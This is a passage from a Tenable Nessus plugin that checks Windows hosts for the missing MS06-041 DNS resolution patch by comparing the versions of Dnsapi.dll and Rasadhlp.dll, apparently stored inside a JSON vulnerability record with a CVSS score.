script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n 
script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS06-041';\nkb = '920683';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'1,2', win2003:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Dnsapi.dll\", version:\"5.2.3790.558\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"Dnsapi.dll\", version:\"5.2.3790.2745\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Dnsapi.dll\", version:\"5.1.2600.1863\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Dnsapi.dll\", version:\"5.1.2600.2938\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Dnsapi.dll\", version:\"5.0.2195.7100\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Rasadhlp.dll\", version:\"5.2.3790.558\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"Rasadhlp.dll\", version:\"5.2.3790.2745\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, 
file:\"Rasadhlp.dll\", version:\"5.1.2600.1863\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Rasadhlp.dll\", version:\"5.1.2600.2938\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Rasadhlp.dll\", version:\"5.0.2195.7098\", dir:\"\\system32\", bulletin:bulletin, kb:kb) )\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}